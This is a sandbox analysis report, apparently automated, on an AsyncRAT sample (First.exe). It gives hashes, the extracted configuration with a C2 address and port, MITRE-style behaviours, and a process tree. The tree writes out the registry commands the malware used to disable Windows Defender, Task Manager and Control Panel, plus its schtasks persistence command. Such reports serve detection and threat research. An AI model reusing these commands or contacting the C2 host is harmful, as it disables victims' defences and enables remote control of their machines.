Analysis

  • max time kernel
    92s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/08/2024, 23:55

General

  • Target

    RC7 (5) (1)/First.exe

  • Size

    139KB

  • MD5

    d5f71f93624190439b569498acca69a9

  • SHA1

    323c616a5ed5e680b221f1db6acfa222e8be719a

  • SHA256

    8bcb2329f01af33a1707f6a1a749987cfaff3976a9bcdbffad37d477dd5fd8ab

  • SHA512

    e03043bbd4389f77d337a33d92764496bd5a84654a95a3792de0a025765d43a795ef1351a64d96c6ae1f85daadc68a1c1fdc192a9adb153a15cf1cb71607b715

  • SSDEEP

    3072:+iS4omp03WQthI/9S3BZi08iRQ1G78IVn27bSfcJK8ltX:+iS4ompB9S3BZi0a1G78IVhcgct

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

45.90.13.137:7707

Mutex

HleCBmrMxwFA

Attributes
  • delay

    3

  • install

    true

  • install_file

    Server-Host.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Async RAT payload 1 IoCs
  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RC7 (5) (1)\First.exe
    "C:\Users\Admin\AppData\Local\Temp\RC7 (5) (1)\First.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3188
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1336
      • C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
          PID:2172
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2948
        • C:\Windows\system32\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
          3⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:5100
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2156
        • C:\Windows\system32\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
          3⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:2360
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2956
        • C:\Windows\system32\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
          3⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:2632
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3528
        • C:\Windows\system32\reg.exe
          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
          3⤵
            PID:4748
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1928
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
            3⤵
              PID:4988
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableSettingsPage /t REG_DWORD /d 1 /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2320
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableSettingsPage /t REG_DWORD /d 1 /f
              3⤵
                PID:4528
            • C:\Users\Admin\AppData\Roaming\Main.exe
              "C:\Users\Admin\AppData\Roaming\Main.exe"
              2⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1968
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Server-Host" /tr '"C:\Users\Admin\AppData\Roaming\Server-Host.exe"' & exit
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2792
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "Server-Host" /tr '"C:\Users\Admin\AppData\Roaming\Server-Host.exe"'
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:748
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD997.tmp.bat""
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2164
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 3
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Delays execution with timeout.exe
                  PID:2664
                • C:\Users\Admin\AppData\Roaming\Server-Host.exe
                  "C:\Users\Admin\AppData\Roaming\Server-Host.exe"
                  4⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1980

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\tmpD997.tmp.bat

            Filesize

            155B

            MD5

            8fdcba6b05fb95ff6297efbc71eaa5b1

            SHA1

            5c705d24ad961ee1abb996b1027d9322085e0a62

            SHA256

            996d32986ecc25c01b3d9bac4154133053edd5c434116bdaf886e0396e35ad9c

            SHA512

            d7d34c1c15c688c4db4be2af890234d879165667570a77076bb7730b2e9549eca9be377d4f88ffc561af36790e2e3bcf95e29018bd757dc1c2c324d438b926ca

          • C:\Users\Admin\AppData\Roaming\Main.exe

            Filesize

            45KB

            MD5

            0f403599792ecdd23aa6834cb51f509e

            SHA1

            bcc135a6107eef55ebc89544cf584ea700f914dc

            SHA256

            be351f8d13bd9e018a7df090bfe4e4ed4b4976ab65e0c36eea3f83ac5e475f0f

            SHA512

            88cec361ff710ce74a1d6bf773984f8a57dfd117ebda48533f8f0394692576c16b0797a06766a5ec67f2ed8dc45632e2c181ad572f3c98ccdff786ba2fb63231

          • memory/1968-4-0x0000000000680000-0x0000000000692000-memory.dmp

            Filesize

            72KB

          • memory/1968-5-0x00000000050B0000-0x000000000514C000-memory.dmp

            Filesize

            624KB

          • memory/1980-14-0x0000000005B20000-0x00000000060C4000-memory.dmp

            Filesize

            5.6MB

          • memory/1980-15-0x0000000005570000-0x00000000055D6000-memory.dmp

            Filesize

            408KB